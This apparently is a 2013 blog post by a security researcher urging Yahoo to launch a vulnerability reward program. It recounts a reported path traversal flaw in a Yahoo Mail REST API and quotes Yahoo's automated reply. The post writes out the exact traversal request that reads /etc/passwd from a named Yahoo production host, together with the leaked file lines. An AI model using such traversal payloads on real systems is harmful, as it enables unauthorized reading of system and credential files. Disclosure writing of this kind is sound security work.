Yahoo, please start with a Vulnerability Reward Program
Yahoo Japan suspects up to 22 million user IDs may have been leaked; does not include passwords #breaking
— Reuters Tech (@ReutersTech) May 17, 2013
This wouldn't happen if Yahoo had a Vulnerability Reward Program like Google, Facebook, Mozilla, Paypal, Etsy, etc (list of reward programs @bugcrowd).
Last year I discovered a LFI/Path Traversal vulnerability in a REST-API used by Yahoo Mail and I got a automated mail from their mailer. I refused to report more bugs to them because it's boring to talk with bots.
GET /v2/xframe/../../../../../../../etc/passwd?bc
HTTP/1.1
Host: prod1.rest-notify.msg.yahoo.com
HTTP/1.1 200 OK
Connection: close
Expires: Thu, 15 Apr 2020 20:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 29676
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:/bin/sh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
Some minutes later I got a automated reply from Yahoo Security Contact (security at yahoo-inc.com)
Nils,
Thank you for contacting Yahoo!. These issues have been passed
along to the correct teams to investigate. Should a fix be required,
we will again contact you and ask that you see the issues as resolved.Thanks again,
Yahoo! Security Contact
Days later the issue was fixed. But no more replies from them!
Yahoo, please start with a Vulnerability Reward Program and get in touch with the community - before it's too late.